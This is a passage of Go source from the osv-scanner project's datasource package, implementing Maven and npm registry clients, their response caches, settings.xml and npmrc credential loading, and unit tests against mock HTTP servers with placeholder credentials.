!registry.ReleasesEnabled { continue } project, err := m.getProject(ctx, registry, groupID, artifactID, version, "") if err == nil { return project, nil } } return maven.Project{}, fmt.Errorf("failed to fetch Maven project %s:%s@%s", groupID, artifactID, version) } for _, registry := range append(m.registries, m.defaultRegistry) { // Fetch version metadata for snapshot versions from the registries enabling that. if !registry.SnapshotsEnabled { continue } metadata, err := m.getVersionMetadata(ctx, registry, groupID, artifactID, version) if err != nil { continue } snapshot := "" for _, sv := range metadata.Versioning.SnapshotVersions { if sv.Extension == "pom" { // We only look for pom.xml for project metadata. snapshot = string(sv.Value) break } } project, err := m.getProject(ctx, registry, groupID, artifactID, version, snapshot) if err == nil { return project, nil } } return maven.Project{}, fmt.Errorf("failed to fetch Maven project %s:%s@%s", groupID, artifactID, version) } // GetVersions returns the list of available versions of a Maven package specified by groupID and artifactID. // Versions found in all registries are unioned, then sorted by semver. func (m *MavenRegistryAPIClient) GetVersions(ctx context.Context, groupID, artifactID string) ([]maven.String, error) { var versions []maven.String for _, registry := range append(m.registries, m.defaultRegistry) { metadata, err := m.getArtifactMetadata(ctx, registry, groupID, artifactID) if err != nil { continue } versions = append(versions, metadata.Versioning.Versions...) } slices.SortFunc(versions, func(a, b maven.String) int { return semver.Maven.Compare(string(a), string(b)) }) return slices.Compact(versions), nil } // getProject fetches a pom.xml specified by groupID, artifactID and version and parses it to maven.Project. // For snapshot versions, the exact version value is specified by snapshot. func (m *MavenRegistryAPIClient) getProject(ctx context.Context, registry MavenRegistry, groupID, artifactID, version, snapshot string) (maven.Project, error) { if snapshot == "" { snapshot = version } u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, version, fmt.Sprintf("%s-%s.pom", artifactID, snapshot)).String() var project maven.Project if err := m.get(ctx, m.registryAuths[registry.ID], u, &project); err != nil { return maven.Project{}, err } return project, nil } // getVersionMetadata fetches a version level maven-metadata.xml and parses it to maven.Metadata. func (m *MavenRegistryAPIClient) getVersionMetadata(ctx context.Context, registry MavenRegistry, groupID, artifactID, version string) (maven.Metadata, error) { u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, version, "maven-metadata.xml").String() var metadata maven.Metadata if err := m.get(ctx, m.registryAuths[registry.ID], u, &metadata); err != nil { return maven.Metadata{}, err } return metadata, nil } // GetArtifactMetadata fetches an artifact level maven-metadata.xml and parses it to maven.Metadata. func (m *MavenRegistryAPIClient) getArtifactMetadata(ctx context.Context, registry MavenRegistry, groupID, artifactID string) (maven.Metadata, error) { u := registry.Parsed.JoinPath(strings.ReplaceAll(groupID, ".", "/"), artifactID, "maven-metadata.xml").String() var metadata maven.Metadata if err := m.get(ctx, m.registryAuths[registry.ID], u, &metadata); err != nil { return maven.Metadata{}, err } return metadata, nil } func (m *MavenRegistryAPIClient) get(ctx context.Context, auth *HTTPAuthentication, apiURL string, dst any) error { resp, err := m.responses.Get(apiURL, func() (response, error) { resp, err := auth.Get(ctx, http.DefaultClient, apiURL) if err != nil { return response{}, fmt.Errorf("%w: Maven registry query failed: %w", errAPIFailed, err) } defer resp.Body.Close() if !slices.Contains([]int{http.StatusOK, http.StatusNotFound, http.StatusUnauthorized}, resp.StatusCode) { // Only cache responses with Status OK, NotFound, or Unauthorized return response{}, fmt.Errorf("%w: Maven registry query status: %d", errAPIFailed, resp.StatusCode) } b, err := io.ReadAll(resp.Body) if err != nil { return response{}, fmt.Errorf("failed to read body: %w", err) } return response{StatusCode: resp.StatusCode, Body: b}, nil }) if err != nil { return err } if resp.StatusCode != http.StatusOK { return fmt.Errorf("%w: Maven registry query status: %d", errAPIFailed, resp.StatusCode) } return NewMavenDecoder(bytes.NewReader(resp.Body)).Decode(dst) } // NewMavenDecoder returns an xml decoder with CharsetReader and Entity set. func NewMavenDecoder(reader io.Reader) *xml.Decoder { decoder := xml.NewDecoder(reader) // Set charset reader for conversion from non-UTF-8 charset into UTF-8. decoder.CharsetReader = charset.NewReaderLabel // Set HTML entity map for translation between non-standard entity names // and string replacements. decoder.Entity = xml.HTMLEntity return decoder } ================================================ FILE: internal/datasource/maven_registry_cache.go ================================================ package datasource import ( "time" ) type mavenRegistryCache struct { Timestamp *time.Time Responses map[string]response // url -> response } func (m *MavenRegistryAPIClient) GobEncode() ([]byte, error) { m.mu.Lock() defer m.mu.Unlock() if m.cacheTimestamp == nil { now := time.Now().UTC() m.cacheTimestamp = &now } cache := mavenRegistryCache{ Timestamp: m.cacheTimestamp, Responses: m.responses.GetMap(), } return gobMarshal(&cache) } func (m *MavenRegistryAPIClient) GobDecode(b []byte) error { var cache mavenRegistryCache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } m.mu.Lock() defer m.mu.Unlock() m.cacheTimestamp = cache.Timestamp m.responses.SetMap(cache.Responses) return nil } ================================================ FILE: internal/datasource/maven_registry_test.go ================================================ package datasource import ( "net/url" "reflect" "testing" "deps.dev/util/maven" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMavenRegistryAPIClient_GetProject(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/1.0.0/x.y.z-1.0.0.pom", []byte(` org.example x.y.z 1.0.0 `)) got, err := client.GetProject(t.Context(), "org.example", "x.y.z", "1.0.0") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "1.0.0", err) } want := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "1.0.0", }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", "1.0.0", got, want) } } func TestGetProjectSnapshot(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, SnapshotsEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/maven-metadata.xml", []byte(` org.example x.y.z 20230302.052731 9 20230302052731 jar 3.3.1-20230302.052731-9 20230302052731 pom 3.3.1-20230302.052731-9 20230302052731 `)) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/x.y.z-3.3.1-20230302.052731-9.pom", []byte(` org.example x.y.z 3.3.1-SNAPSHOT `)) got, err := client.GetProject(t.Context(), "org.example", "x.y.z", "3.3.1-SNAPSHOT") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "3.3.1-SNAPSHOT", err) } want := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "3.3.1-SNAPSHOT", }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", "3.3.1-SNAPSHOT", got, want) } } func TestGetArtifactMetadata(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 3.0 3.0 1.0 2.0 3.0 `)) u, err := url.Parse(srv.URL) if err != nil { t.Fatalf("failed to get parse URL %s: %v", srv.URL, err) } got, err := client.getArtifactMetadata(t.Context(), MavenRegistry{Parsed: u}, "org.example", "x.y.z") if err != nil { t.Fatalf("failed to get artifact metadata for %s:%s: %v", "org.example", "x.y.z", err) } want := maven.Metadata{ GroupID: "org.example", ArtifactID: "x.y.z", Versioning: maven.Versioning{ Latest: "3.0", Release: "3.0", Versions: []maven.String{ "1.0", "2.0", "3.0", }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("GetArtifactMetadata(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", got, want) } } func TestGetVersionMetadata(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: srv.URL, SnapshotsEnabled: true}) srv.SetResponse(t, "org/example/x.y.z/3.3.1-SNAPSHOT/maven-metadata.xml", []byte(` org.example x.y.z 20230302.052731 9 20230302052731 jar 3.3.1-20230302.052731-9 20230302052731 pom 3.3.1-20230302.052731-9 20230302052731 `)) u, err := url.Parse(srv.URL) if err != nil { t.Fatalf("failed to get parse URL %s: %v", srv.URL, err) } got, err := client.getVersionMetadata(t.Context(), MavenRegistry{Parsed: u}, "org.example", "x.y.z", "3.3.1-SNAPSHOT") if err != nil { t.Fatalf("failed to get metadata for %s:%s verion %s: %v", "org.example", "x.y.z", "3.3.1-SNAPSHOT", err) } want := maven.Metadata{ GroupID: "org.example", ArtifactID: "x.y.z", Versioning: maven.Versioning{ Snapshot: maven.Snapshot{ Timestamp: "20230302.052731", BuildNumber: 9, }, LastUpdated: "20230302052731", SnapshotVersions: []maven.SnapshotVersion{ { Extension: "jar", Value: "3.3.1-20230302.052731-9", Updated: "20230302052731", }, { Extension: "pom", Value: "3.3.1-20230302.052731-9", Updated: "20230302052731", }, }, }, } if !reflect.DeepEqual(got, want) { t.Errorf("getVersionMetadata(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", got, want) } } func TestMultipleRegistry(t *testing.T) { t.Parallel() dft := testutility.NewMockHTTPServer(t) client, _ := NewMavenRegistryAPIClient(MavenRegistry{URL: dft.URL, ReleasesEnabled: true}) dft.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 3.0.0 3.0.0 2.0.0 3.0.0 `)) dft.SetResponse(t, "org/example/x.y.z/2.0.0/x.y.z-2.0.0.pom", []byte(` org.example x.y.z 2.0.0 `)) dft.SetResponse(t, "org/example/x.y.z/3.0.0/x.y.z-3.0.0.pom", []byte(` org.example x.y.z 3.0.0 `)) srv := testutility.NewMockHTTPServer(t) if err := client.AddRegistry(MavenRegistry{URL: srv.URL, ReleasesEnabled: true}); err != nil { t.Fatalf("failed to add registry %s: %v", srv.URL, err) } srv.SetResponse(t, "org/example/x.y.z/maven-metadata.xml", []byte(` org.example x.y.z 2.0.0 2.0.0 1.0.0 2.0.0 `)) srv.SetResponse(t, "org/example/x.y.z/1.0.0/x.y.z-1.0.0.pom", []byte(` org.example x.y.z 1.0.0 `)) srv.SetResponse(t, "org/example/x.y.z/2.0.0/x.y.z-2.0.0.pom", []byte(` org.example x.y.z 2.0.0 `)) gotProj, err := client.GetProject(t.Context(), "org.example", "x.y.z", "1.0.0") if err != nil { t.Fatalf("failed to get Maven project %s:%s verion %s: %v", "org.example", "x.y.z", "1.0.0", err) } wantProj := maven.Project{ ProjectKey: maven.ProjectKey{ GroupID: "org.example", ArtifactID: "x.y.z", Version: "1.0.0", }, } if !reflect.DeepEqual(gotProj, wantProj) { t.Errorf("GetProject(%s, %s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", "1.0.0", gotProj, wantProj) } gotVersions, err := client.GetVersions(t.Context(), "org.example", "x.y.z") if err != nil { t.Fatalf("failed to get versions for Maven package %s:%s: %v", "org.example", "x.y.z", err) } wantVersions := []maven.String{"1.0.0", "2.0.0", "3.0.0"} if !reflect.DeepEqual(gotVersions, wantVersions) { t.Errorf("GetVersions(%s, %s):\ngot %v\nwant %v\n", "org.example", "x.y.z", gotVersions, wantVersions) } } ================================================ FILE: internal/datasource/maven_settings.go ================================================ package datasource import ( "encoding/xml" "os" "os/exec" "path/filepath" "runtime" "strings" "unicode" "github.com/google/osv-scanner/v2/internal/cachedregexp" ) // Maven settings.xml file parsing for registry authentication. // https://maven.apache.org/settings.html type MavenSettingsXML struct { Servers []MavenSettingsXMLServer `xml:"servers>server"` } type MavenSettingsXMLServer struct { ID string `xml:"id"` Username string `xml:"username"` Password string `xml:"password"` } func ParseMavenSettings(path string) MavenSettingsXML { f, err := os.Open(path) if err != nil { return MavenSettingsXML{} } defer f.Close() var settings MavenSettingsXML if err := xml.NewDecoder(f).Decode(&settings); err != nil { return MavenSettingsXML{} } // interpolate strings with environment variables only // system properties are too hard to determine. re := cachedregexp.MustCompile(`\${env\.[^}]*}`) replFn := func(match string) string { // grab just the environment variable string env := match[len("${env.") : len(match)-1] // Environment variables on Windows are case-insensitive, // but Maven will only replace them if they are in all-caps. if runtime.GOOS == "windows" && strings.ContainsFunc(env, unicode.IsLower) { return match // No replacement. } if val, ok := os.LookupEnv(env); ok { return val } // Don't do any replacement if the environment variable isn't set return match } for i := range settings.Servers { settings.Servers[i].ID = re.ReplaceAllStringFunc(settings.Servers[i].ID, replFn) settings.Servers[i].Username = re.ReplaceAllStringFunc(settings.Servers[i].Username, replFn) settings.Servers[i].Password = re.ReplaceAllStringFunc(settings.Servers[i].Password, replFn) } return settings } // TODO: How to use with virtual filesystem + environment variables. func globalMavenSettingsFile() string { // ${maven.home}/conf/settings.xml // Find ${maven.home} from the installed mvn binary mvnExec, err := exec.LookPath("mvn") if err != nil { return "" } mvnExec, err = filepath.EvalSymlinks(mvnExec) if err != nil { return "" } settings := filepath.Join(filepath.Dir(mvnExec), "..", "conf", "settings.xml") settings, err = filepath.Abs(settings) if err != nil { return "" } return settings } func userMavenSettingsFile() string { // ${user.home}/.m2/settings.xml home, err := os.UserHomeDir() if err != nil { return "" } return filepath.Join(home, ".m2", "settings.xml") } var mavenSupportedAuths = []HTTPAuthMethod{AuthDigest, AuthBasic} func MakeMavenAuth(globalSettings, userSettings MavenSettingsXML) map[string]*HTTPAuthentication { auth := make(map[string]*HTTPAuthentication) for _, s := range globalSettings.Servers { auth[s.ID] = &HTTPAuthentication{ SupportedMethods: mavenSupportedAuths, AlwaysAuth: false, Username: s.Username, Password: s.Password, } } for _, s := range userSettings.Servers { auth[s.ID] = &HTTPAuthentication{ SupportedMethods: mavenSupportedAuths, AlwaysAuth: false, Username: s.Username, Password: s.Password, } } return auth } ================================================ FILE: internal/datasource/maven_settings_test.go ================================================ package datasource_test import ( "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scanner/v2/internal/datasource" ) func TestParseMavenSettings(t *testing.T) { t.Setenv("MAVEN_SETTINGS_TEST_USR", "UsErNaMe") t.Setenv("MAVEN_SETTINGS_TEST_PWD", "P455W0RD") t.Setenv("MAVEN_SETTINGS_TEST_SID", "my-cool-server") t.Setenv("MAVEN_SETTINGS_TEST_NIL", "") want := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "server1", Username: "user", Password: "pass", }, { ID: "server2", Username: "UsErNaMe", Password: "~~P455W0RD~~", }, { ID: "my-cool-server", Username: "${env.maven_settings_test_usr}-", Password: "${env.MAVEN_SETTINGS_TEST_BAD}", }, }, } got := datasource.ParseMavenSettings("./testdata/maven_settings/settings.xml") if diff := cmp.Diff(want, got); diff != "" { t.Errorf("ParseMavenSettings() (-want +got):\n%s", diff) } } func TestMakeMavenAuth(t *testing.T) { t.Parallel() globalSettings := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "global", Username: "global-user", Password: "global-pass", }, { ID: "overwrite1", Username: "original-user", Password: "original-pass", }, { ID: "overwrite2", Username: "user-to-be-deleted", // no password }, }, } userSettings := datasource.MavenSettingsXML{ Servers: []datasource.MavenSettingsXMLServer{ { ID: "user", Username: "user", Password: "pass", }, { ID: "overwrite1", Username: "new-user", Password: "new-pass", }, { ID: "overwrite2", // no username Password: "lone-password", }, }, } wantSupportedMethods := []datasource.HTTPAuthMethod{datasource.AuthDigest, datasource.AuthBasic} want := map[string]*datasource.HTTPAuthentication{ "global": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "global-user", Password: "global-pass", }, "user": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "user", Password: "pass", }, "overwrite1": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "new-user", Password: "new-pass", }, "overwrite2": { SupportedMethods: wantSupportedMethods, AlwaysAuth: false, Username: "", Password: "lone-password", }, } got := datasource.MakeMavenAuth(globalSettings, userSettings) if diff := cmp.Diff(want, got, cmpopts.IgnoreUnexported(datasource.HTTPAuthentication{})); diff != "" { t.Errorf("MakeMavenAuth() (-want +got):\n%s", diff) } } ================================================ FILE: internal/datasource/npm_registry.go ================================================ package datasource import ( "context" "errors" "fmt" "io" "maps" "net/http" "slices" "sync" "time" "github.com/tidwall/gjson" ) type NpmRegistryAPIClient struct { // Registries from the npmrc config // This should only be written to when the client is first being created. // Other functions should not modify it & it is not covered by the mutex. registries NpmRegistryConfig // cache fields mu sync.Mutex cacheTimestamp *time.Time // If set, this means we loaded from a cache details *RequestCache[string, npmRegistryPackageDetails] } type npmRegistryPackageDetails struct { // Only cache the info needed for the DependencyClient Versions map[string]NpmRegistryDependencies Tags map[string]string } func NewNpmRegistryAPIClient(workdir string) (*NpmRegistryAPIClient, error) { registries, err := LoadNpmRegistryConfig(workdir) if err != nil { return nil, err } return &NpmRegistryAPIClient{ registries: registries, details: NewRequestCache[string, npmRegistryPackageDetails](), }, nil } type NpmRegistryVersions struct { Versions []string Tags map[string]string } func (c *NpmRegistryAPIClient) Versions(ctx context.Context, pkg string) (NpmRegistryVersions, error) { pkgDetails, err := c.getPackageDetails(ctx, pkg) if err != nil { return NpmRegistryVersions{}, err } return NpmRegistryVersions{ Versions: slices.AppendSeq(make([]string, 0, len(pkgDetails.Versions)), maps.Keys(pkgDetails.Versions)), Tags: pkgDetails.Tags, }, nil } type NpmRegistryDependencies struct { // TODO: These maps should preserve ordering from JSON response Dependencies map[string]string DevDependencies map[string]string PeerDependencies map[string]string OptionalDependencies map[string]string BundleDependencies []string } func (c *NpmRegistryAPIClient) Dependencies(ctx context.Context, pkg, version string) (NpmRegistryDependencies, error) { pkgDetails, err := c.getPackageDetails(ctx, pkg) if err != nil { return NpmRegistryDependencies{}, err } if deps, ok := pkgDetails.Versions[version]; ok { return deps, nil } return NpmRegistryDependencies{}, fmt.Errorf("no version %s for package %s", version, pkg) } func (c *NpmRegistryAPIClient) FullJSON(ctx context.Context, pkg, version string) (gjson.Result, error) { return c.get(ctx, pkg, version) } func (c *NpmRegistryAPIClient) get(ctx context.Context, urlComponents ...string) (gjson.Result, error) { resp, err := c.registries.MakeRequest(ctx, http.DefaultClient, urlComponents...) if err != nil { return gjson.Result{}, err } defer resp.Body.Close() if resp.StatusCode != http.StatusOK { return gjson.Result{}, errors.New(resp.Status) } body, err := io.ReadAll(resp.Body) if err != nil { return gjson.Result{}, err } res := gjson.ParseBytes(body) return res, nil } func (c *NpmRegistryAPIClient) getPackageDetails(ctx context.Context, pkg string) (npmRegistryPackageDetails, error) { return c.details.Get(pkg, func() (npmRegistryPackageDetails, error) { jsonData, err := c.get(ctx, pkg) if err != nil { return npmRegistryPackageDetails{}, err } versions := make(map[string]NpmRegistryDependencies) for v, data := range jsonData.Get("versions").Map() { versions[v] = NpmRegistryDependencies{ Dependencies: jsonToStringMap(data.Get("dependencies")), DevDependencies: jsonToStringMap(data.Get("devDependencies")), PeerDependencies: jsonToStringMap(data.Get("peerDependencies")), OptionalDependencies: jsonToStringMap(data.Get("optionalDependencies")), BundleDependencies: jsonToStringSlice(data.Get("bundleDependencies")), } } return npmRegistryPackageDetails{ Versions: versions, Tags: jsonToStringMap(jsonData.Get("dist-tags")), }, nil }) } func jsonToStringSlice(v gjson.Result) []string { arr := v.Array() if len(arr) == 0 { return nil } strs := make([]string, len(arr)) for i, s := range arr { strs[i] = s.String() } return strs } func jsonToStringMap(v gjson.Result) map[string]string { mp := v.Map() if len(mp) == 0 { return nil } strs := make(map[string]string) for k, s := range mp { strs[k] = s.String() } return strs } ================================================ FILE: internal/datasource/npm_registry_cache.go ================================================ package datasource import ( "maps" "strings" "time" ) type npmRegistryCache struct { Timestamp *time.Time // Timestamp of when this cache was made Details map[string]npmRegistryPackageDetails // For a package name, the versions & their dependencies, and the list of tags ScopeURLs map[string]string // The URL of the registry used for a given package @scope. Used to invalidate cache if registry has changed. } func (c *NpmRegistryAPIClient) GobEncode() ([]byte, error) { c.mu.Lock() defer c.mu.Unlock() if c.cacheTimestamp == nil { now := time.Now().UTC() c.cacheTimestamp = &now } cache := npmRegistryCache{ Timestamp: c.cacheTimestamp, Details: c.details.GetMap(), ScopeURLs: make(map[string]string), } // store the registry URL for each scope (but not the auth info) cache.ScopeURLs = c.registries.ScopeURLs return gobMarshal(&cache) } func (c *NpmRegistryAPIClient) GobDecode(b []byte) error { // decode the cached data var cache npmRegistryCache if err := gobUnmarshal(b, &cache); err != nil { return err } if cache.Timestamp != nil && time.Since(*cache.Timestamp) >= cacheExpiry { // Cache expired return nil } c.mu.Lock() defer c.mu.Unlock() // remove any cache entries whose registry has changed maps.DeleteFunc(cache.Details, func(pkg string, _ npmRegistryPackageDetails) bool { scope := "" if strings.HasPrefix(pkg, "@") { scope, _, _ = strings.Cut(pkg, "/") } return cache.ScopeURLs[scope] != c.registries.ScopeURLs[scope] }) c.cacheTimestamp = cache.Timestamp c.details.SetMap(cache.Details) return nil } ================================================ FILE: internal/datasource/npm_registry_test.go ================================================ package datasource_test import ( compare "cmp" "path/filepath" "strings" "testing" "github.com/google/go-cmp/cmp" "github.com/google/go-cmp/cmp/cmpopts" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/tidwall/gjson" ) func TestNpmRegistryClient(t *testing.T) { t.Parallel() //nolint:gosec // "Potential hardcoded credentials" :) const ( auth = "Y29vbDphdXRoCg==" authToken = "bmljZS10b2tlbgo=" ) srv1 := testutility.NewMockHTTPServer(t) srv1.SetAuthorization(t, "Basic "+auth) srv1.SetResponseFromFile(t, "/fake-package", "./testdata/npm_registry/fake-package.json") srv1.SetResponseFromFile(t, "/fake-package/2.2.2", "./testdata/npm_registry/fake-package-2.2.2.json") srv2 := testutility.NewMockHTTPServer(t) srv2.SetAuthorization(t, "Bearer "+authToken) srv2.SetResponseFromFile(t, "/@fake-registry%2fa", "./testdata/npm_registry/@fake-registry-a.json") npmrcFile := createTempNpmrc(t, ".npmrc") writeToNpmrc(t, npmrcFile, "registry="+srv1.URL, "//"+strings.TrimPrefix(srv1.URL, "http://")+"/:_auth="+auth, "@fake-registry:registry="+srv2.URL, "//"+strings.TrimPrefix(srv2.URL, "http://")+"/:_authToken="+authToken, ) cl, err := datasource.NewNpmRegistryAPIClient(filepath.Dir(npmrcFile)) if err != nil { t.Fatalf("failed creating npm api client: %v", err) } { const pkg = "fake-package" want := datasource.NpmRegistryVersions{ Versions: []string{"1.0.0", "2.2.2"}, Tags: map[string]string{ "latest": "1.0.0", "version1": "1.0.0", "version2": "2.2.2", }, } got, err := cl.Versions(t.Context(), pkg) if err != nil { t.Fatalf("failed getting versions: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Versions(\"%s\") (-want +got)\n%s", pkg, diff) } } { const pkg = "@fake-registry/a" want := datasource.NpmRegistryVersions{ Versions: []string{"1.2.3", "2.3.4"}, Tags: map[string]string{"latest": "2.3.4"}, } got, err := cl.Versions(t.Context(), pkg) if err != nil { t.Fatalf("failed getting versions: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Versions(\"%s\") (-want +got)\n%s", pkg, diff) } } { const pkg = "fake-package" const ver = "2.2.2" want := datasource.NpmRegistryDependencies{ Dependencies: map[string]string{ "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1", }, DevDependencies: map[string]string{ "c": "^1.1.1", "d": "^1.0.2", }, PeerDependencies: map[string]string{ "h": "^1.0.0", }, OptionalDependencies: map[string]string{ "e": "^0.2.33", "f": "npm:g@^2.0.1", }, BundleDependencies: []string{ "a", }, } got, err := cl.Dependencies(t.Context(), pkg, ver) if err != nil { t.Fatalf("failed getting dependencies: %v", err) } if diff := cmp.Diff(want, got, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("Dependencies(\"%s\", \"%s\") (-want +got)\n%s", pkg, ver, diff) } } { const pkg = "fake-package" const ver = "2.2.2" want := gjson.Parse(`{ "name": "fake-package", "version": "2.2.2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "a": "^3.0.1", "b": "^2.0.1", "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "devDependencies": { "c": "^1.1.1", "d": "^1.0.2" }, "optionalDependencies": { "e": "^0.2.33", "f": "npm:g@^2.0.1" }, "peerDependencies": { "h": "^1.0.0" }, "bundleDependencies": [ "a" ], "_id": "fake-package@2.2.2", "_nodeVersion": "20.9.0", "_npmVersion": "10.1.0", "dist": { "integrity": "sha512-NWvNE9fxykrzSQVr1CSKchzkQr5qwplvgn3O/0JL46qM6BhoGlKRjLiaZYdo1byXJWLGthghOgGpUZiEL04HQQ==", "shasum": "8dc47515da4e67bb794a4c9c7f4750bb4d67c7fc", "tarball": "http://localhost:4873/fake-package/-/fake-package-2.2.2.tgz" }, "contributors": [] }`) got, err := cl.FullJSON(t.Context(), pkg, ver) if err != nil { t.Fatalf("failed getting full json: %v", err) } wantMap := want.Value().(map[string]any) gotMap := got.Value().(map[string]any) if diff := cmp.Diff(wantMap, gotMap, cmpopts.SortSlices(compare.Less[string])); diff != "" { t.Errorf("FullJSON(\"%s\", \"%s\") (-want +got)\n%s", pkg, ver, diff) } } } ================================================ FILE: internal/datasource/npmrc.go ================================================ package datasource import ( "bytes" "context" "encoding/base64" "errors" "net/http" "net/url" "os" "os/exec" "path/filepath" "strings" "github.com/google/osv-scanner/v2/internal/cachedregexp" "gopkg.in/ini.v1" ) type NpmrcConfig map[string]string func loadNpmrc(workdir string) (NpmrcConfig, error) { // Find & parse the 4 npmrc files (builtin, global, user, project) + values set in environment variables // https://docs.npmjs.com/cli/v10/configuring-npm/npmrc // https://docs.npmjs.com/cli/v10/using-npm/config // project npmrc is always in ./.npmrc projectFile, _ := filepath.Abs(filepath.Join(workdir, ".npmrc")) // TODO: Pass in environment variables so we can sandbox tests builtinFile := builtinNpmrc() envVarOpts, _ := envVarNpmrc() opts := ini.LoadOptions{ Loose: true, // ignore missing files KeyValueDelimiters: "=", // default delimiters are "=:", but npmrc uses : in some keys } // Make use of data overwriting to load the correct values fullNpmrc, err := ini.LoadSources(opts, builtinFile, projectFile, envVarOpts) if err != nil { return nil, err } // user npmrc is either set as userconfig, or ${HOME}/.npmrc // though userconfig cannot be set in the user or global npmrcs var userFile string switch { case fullNpmrc.Section("").HasKey("userconfig"): userFile = os.ExpandEnv(fullNpmrc.Section("").Key("userconfig").String()) // TODO: npm config replaces only ${VAR}, not $VAR // and if VAR is unset, it will leave the string as "${VAR}" default: homeDir, err := os.UserHomeDir() if err == nil { // only set userFile if homeDir exists userFile = filepath.Join(homeDir, ".npmrc") } } // reload the npmrc files with the user file included fullNpmrc, err = ini.LoadSources(opts, builtinFile, userFile, projectFile, envVarOpts) if err != nil { return nil, err } var globalFile string // global npmrc is either set as globalconfig, prefix/etc/npmrc, ${PREFIX}/etc/npmrc // cannot be set within the global npmrc itself switch { case fullNpmrc.Section("").HasKey("globalconfig"): globalFile = os.ExpandEnv(fullNpmrc.Section("").Key("globalconfig").String()) // TODO: Windows case fullNpmrc.Section("").HasKey("prefix"): prefix := os.ExpandEnv(fullNpmrc.Section("").Key("prefix").String()) globalFile, _ = filepath.Abs(filepath.Join(prefix, "etc", "npmrc")) case os.Getenv("PREFIX") != "": globalFile, _ = filepath.Abs(filepath.Join(os.Getenv("PREFIX"), "etc", "npmrc")) default: globalFile = filepath.Join("/etc", "npmrc") // TODO: what should this be actually? } // return final joined config, with correct overriding order fullNpmrc, err = ini.LoadSources(opts, builtinFile, globalFile, userFile, projectFile, envVarOpts) if err != nil { return nil, err } return fullNpmrc.Section("").KeysHash(), nil } func envVarNpmrc() ([]byte, error) { // parse npm config settings that were set in environment variables, // returns a ini.Load()-able byte array of the values iniFile := ini.Empty() // npm config environment variables seem to be case-insensitive, interpreted in lowercase // get all the matching environment variables and their values const envPrefix = "npm_config_" for _, env := range os.Environ() { split := strings.SplitN(env, "=", 2) k := strings.ToLower(split[0]) v := split[1] if s, ok := strings.CutPrefix(k, envPrefix); ok { if _, err := iniFile.Section("").NewKey(s, v); err != nil { return nil, err } } } var buf bytes.Buffer _, err := iniFile.WriteTo(&buf) return buf.Bytes(), err } func builtinNpmrc() string { // builtin is always at /path/to/npm/npmrc npmExec, err := exec.LookPath("npm") if err != nil { return "" } npmExec, err = filepath.EvalSymlinks(npmExec) if err != nil { return "" } npmrc := filepath.Join(filepath.Dir(npmExec), "..", "npmrc") npmrc, err = filepath.Abs(npmrc) if err != nil { return "" } return npmrc } // NpmRegistryAuths handles npm registry authentication in a manner similar to npm-registry-fetch // https://github.com/npm/npm-registry-fetch/blob/237d33b45396caa00add61e0549cf09fbf9deb4f/lib/auth.js type NpmRegistryAuths map[string]*HTTPAuthentication func (auths NpmRegistryAuths) GetAuth(uri string) *HTTPAuthentication { parsed, err := url.Parse(uri) if err != nil { return nil } regKey := "//" + parsed.Host + parsed.EscapedPath() for regKey != "//" { if httpAuth, ok := auths[regKey]; ok { // Make sure this httpAuth actually has the necessary fields to construct an auth. // i.e. it's not valid if only Username or only Password is set if httpAuth.BearerToken != "" || httpAuth.BasicAuth != "" || (httpAuth.Username != "" && httpAuth.Password != "") { return httpAuth } } // can be either //host/some/path/:_auth or //host/some/path:_auth // walk up by removing EITHER what's after the slash OR the slash itself var 